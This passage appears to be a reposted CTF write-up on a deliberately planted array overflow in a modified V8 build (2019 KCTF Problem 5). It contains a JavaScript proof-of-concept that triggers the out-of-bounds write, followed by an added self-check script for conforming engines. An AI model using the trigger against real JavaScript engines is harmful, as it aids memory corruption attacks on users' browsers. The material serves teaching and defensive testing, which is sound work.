V8 Array Overflow Exploitation: 2019 KCTF Problem 5

Read the original article: V8 Array Overflow Exploitation: 2019 KCTF Problem 5


Introduction to the KCTF Problem

Problem 5 – 小虎还乡 of the 2019 KCTF competition provides a vulnerable V8 build. The build contains an array overflow vulnerability, but it is not a native V8 bug: the problem authors modified several V8 source files to introduce it by hand. This post walks step by step through exploiting that vulnerability.

PoC of the V8 Array Overflow Vulnerability

    var buggy;
    var overwrite_length = () => {
        // A Date far outside the representable range (the index is derived from it below)
        let oob = new Date(-864000000 * 15000000);
        oob = Math.abs(oob.getDate() - 16) >> 5;
        buggy = [1.1];
        // The store whose index is computed from the Date value above
        buggy[oob * 4] = 1.1;
    };
    // The PoC's hot loop: call the function many times
    for (let i = 0; i < 0x10000; i++) overwrite_length();
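As an added self-check (this is not code from the original write-up or from the CTF authors), the snippet below isolates the PoC's index computation and runs the same hot-loop pattern on whatever engine executes it. Under standard ECMAScript semantics the Date is invalid, `getDate()` yields `NaN`, and `NaN >> 5` is `0`, so the store is in bounds; an unmodified engine must therefore leave the array's length and shape untouched, and any deviation reported by `runPocCheck` points at an engine that mishandles this pattern. The function names and the returned fields are this example's own.

```javascript
// Added example, not part of the original post: evaluate the PoC's index
// expression under standard semantics and run the PoC pattern as a self-check.

// The PoC's index computation, isolated so it can be inspected on its own.
function pocIndex() {
  // -864000000 * 15000000 = -1.296e16 ms, beyond the +/-8.64e15 ms range a
  // Date can represent, so the Date is invalid and getDate() returns NaN.
  const oob = new Date(-864000000 * 15000000);
  // NaN - 16 is NaN, Math.abs(NaN) is NaN, and NaN >> 5 converts NaN to 0.
  return Math.abs(oob.getDate() - 16) >> 5;
}

// Runs the PoC's hot loop and reports what happened to the array.
// `iterations` defaults to the PoC's 0x10000 (assumption: same count as the PoC).
function runPocCheck(iterations = 0x10000) {
  let buggy;
  const overwriteLength = () => {
    const idx = pocIndex();
    buggy = [1.1];
    buggy[idx * 4] = 1.1;
  };
  for (let i = 0; i < iterations; i++) overwriteLength();
  return {
    index: pocIndex() * 4,          // 0 on a conforming engine
    length: buggy.length,           // must still be 1
    element0: buggy[0],             // 1.1
    // On a conforming engine nothing was written past index 0.
    outOfBoundsUntouched: buggy[4] === undefined,
    intact: buggy.length === 1 && buggy[4] === undefined,
  };
}

const result = runPocCheck();
console.log(
  result.intact ? "engine handles the PoC pattern correctly" : "array state corrupted",
  result
);
```

Run it with `node` (or `d8`); a conforming engine prints the "handles correctly" line with `index: 0` and `length: 1`. The check is deliberately conservative: it only reports whether the observable array state changed, which is the fact a defender needs when verifying that a given V8 build is not the modified one.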

The PoC code triggers the array overflow bug. The following explains how the PoC works.

